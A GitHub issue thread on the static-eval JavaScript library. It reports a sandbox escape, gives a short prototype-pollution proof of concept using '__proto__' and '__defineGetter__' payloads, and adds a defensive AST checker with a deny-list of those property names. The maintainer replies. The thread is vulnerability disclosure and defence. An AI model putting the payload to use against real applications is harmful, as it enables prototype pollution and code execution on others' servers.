
Sandbox Escape

Open · po6ix opened this issue 5 years ago · 1 comment

PoC:

// make pollution
const evaluate = require('static-eval');
const parse = require('esprima').parse;

var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])`
var ast = parse(src).body[0].expression;

evaluate(ast);

// serve webapp
const express = require('express');
const app = express();

app.get('/', (req, res) => {
    res.end('working!');
});

app.listen(8080);

details in https://blog.p6.is/bypassing-a-js-sandbox/#Prototype-Pollution-to-Remote-Code-Execution

po6ix · Jul 29 '20 04:07
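An added defensive check, written for this thread and not code from static-eval or from the reporter: it walks an esprima-shaped AST before it is handed to static-eval and rejects any member access that reaches `__proto__`, `constructor`, `prototype` or the `__define*__`/`__lookup*__` accessors (the chain the PoC above uses), and also any computed key that is not a literal, since its name cannot be known statically. The sample ASTs are hand-built to mirror esprima's output so the check runs without the library, and the deny-list is my own assumption of a reasonable starting point rather than a complete fix.

```javascript
// Property names through which an evaluated expression can reach
// Object.prototype or a function constructor (assumed deny-list, not exhaustive).
const DENIED_PROPERTIES = new Set([
  '__proto__', 'constructor', 'prototype',
  '__defineGetter__', '__defineSetter__', '__lookupGetter__', '__lookupSetter__',
]);

// Statically known name of a member access, or null when the key is dynamic.
function memberName(node) {
  if (!node.computed) return node.property.name;
  if (node.property.type === 'Literal') return String(node.property.value);
  return null;
}

// Depth-first walk over an esprima-style AST; returns a description of the
// first unsafe access found, or null when the tree looks safe.
function findDangerousAccess(node) {
  if (!node || typeof node !== 'object') return null;
  if (Array.isArray(node)) {
    for (const child of node) {
      const hit = findDangerousAccess(child);
      if (hit) return hit;
    }
    return null;
  }
  if (node.type === 'MemberExpression') {
    const name = memberName(node);
    if (name === null) return 'dynamic property key';
    if (DENIED_PROPERTIES.has(name)) return name;
  }
  for (const key of Object.keys(node)) {
    if (key === 'type' || key === 'loc' || key === 'range') continue;
    const hit = findDangerousAccess(node[key]);
    if (hit) return hit;
  }
  return null;
}

// Gate to call before static-eval's evaluate(ast).
function isSafeToEvaluate(ast) {
  return findDangerousAccess(ast) === null;
}

// Constructed ASTs (esprima shape) for the PoC expression and for a benign `1 + 2`.
const lit = (value) => ({ type: 'Literal', value });
const obj = () => ({ type: 'ObjectExpression', properties: [] });
const member = (object, property) => ({ type: 'MemberExpression', computed: true, object, property });
const POC_AST = {
  type: 'CallExpression',
  callee: member(member(obj(), lit('__proto__')), lit('__defineGetter__')),
  arguments: [lit('toString'), member(obj(), lit('constructor'))],
};
const BENIGN_AST = { type: 'BinaryExpression', operator: '+', left: lit(1), right: lit(2) };
```

`findDangerousAccess(POC_AST)` reports `'__defineGetter__'` (the outermost access is checked first) while `isSafeToEvaluate(BENIGN_AST)` is `true`.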

Thanks for the report! As the readme says, we don't encourage people to use static-eval on untrusted input because of things like this; there are probably many more undiscovered ways too :sweat_smile:

I'll see if there is a simple fix for this, anyway, but it's not the highest priority.

goto-bus-stop · Aug 14 '20 06:08